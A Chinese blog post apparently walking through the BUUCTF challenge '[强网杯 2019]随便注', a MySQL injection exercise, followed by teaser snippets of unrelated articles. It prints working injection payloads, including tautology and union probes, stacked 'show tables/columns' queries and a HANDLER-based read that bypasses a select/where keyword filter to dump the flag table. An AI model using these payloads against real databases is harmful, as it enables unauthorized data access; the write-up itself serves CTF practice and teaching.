news 2026/4/16 2:57:19

【BUUCTF系列】[强网杯 2019]随便注

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【BUUCTF系列】[强网杯 2019]随便注

这是一道sql注入题目

先输入1看看

显示了一些不知道什么东西

尝试1' or 1=1 #万能密码

看上去也没有一些有用的信息

然后尝试 联合注入查询

1' ORDER BY 3#

也没有什么有用的

尝试union注入

1' union select 1,2#

这里回显了被过滤的关键词,很明显后端把selectwhere这些核心关键字都加入了过滤规则。

先用show databases爆破数据库

'

看来有用

然后进一步show tables爆破表

看到了有个"数字串"的表和"word"表

1'; show columns from words; #
1'; show columns from `1919810931114514`; #

分别爆破这两个表看看 column列

再数字的表里面看到了flag

由于过滤了where select等字段 所以需要绕过这些字段 再不断尝试和学习 加上之前的积累

使用

1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#

注入后就可以得到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/12 9:31:34

N皇后问题

回溯算法解N皇后问题详解成员变量说明result存储所有有效的棋盘解,每个解是一个字符串向量,表示棋盘状态。board表示当前棋盘状态,初始为全.。colUsed标记列是否被占用,mainDiag和antiDiag分别标记主对角线和副对角线是否被占用。…

作者头像 李华
网站建设 2026/4/13 22:46:47

Wan2.2-T2V-A14B在AI音乐MV自动生成中的协同创作模式

Wan2.2-T2V-A14B在AI音乐MV自动生成中的协同创作模式 你有没有想过,一首歌的MV可以完全由AI生成?不是简单的画面拼接,而是真正理解歌词意境、节奏起伏和情感张力,自动构建出具有电影质感的动态影像——从樱花飘落的慢镜头到赛博都…

作者头像 李华
网站建设 2026/4/15 5:00:43

Wan2.2-T2V-A14B模型更新日志解读:v2.2版本带来了什么?

Wan2.2-T2V-A14B模型更新日志解读:v2.2版本带来了什么?在短视频、广告创意和影视预演需求爆炸式增长的今天,内容创作的速度与质量正面临前所未有的挑战。传统视频制作依赖专业团队、高昂成本和漫长周期,而AI生成技术的崛起正在悄然…

作者头像 李华
网站建设 2026/4/10 10:01:58

Wan2.2-T2V-A14B如何实现多角色协同行为的合理编排

Wan2.2-T2V-A14B如何实现多角色协同行为的合理编排 在影视预演、高端广告和数字人协作系统中,一个长期困扰AI生成技术的核心难题是:如何让多个虚拟角色像真实世界一样自然互动?不是简单地把几个人物拼在同一画面里,而是让他们“有…

作者头像 李华
网站建设 2026/4/15 15:03:13

解决C++ Builder中的资源标识符问题

在使用C++ Builder 11.2进行开发时,常常会遇到一些资源文件(.rc文件)中定义的标识符在C++源代码中无法识别的现象。本文将结合实例详细讲解如何解决这一问题,确保你在开发过程中能够顺利使用资源文件中的标识符。 问题描述 假设你有一个名为strings.rc的资源文件,其中包…

作者头像 李华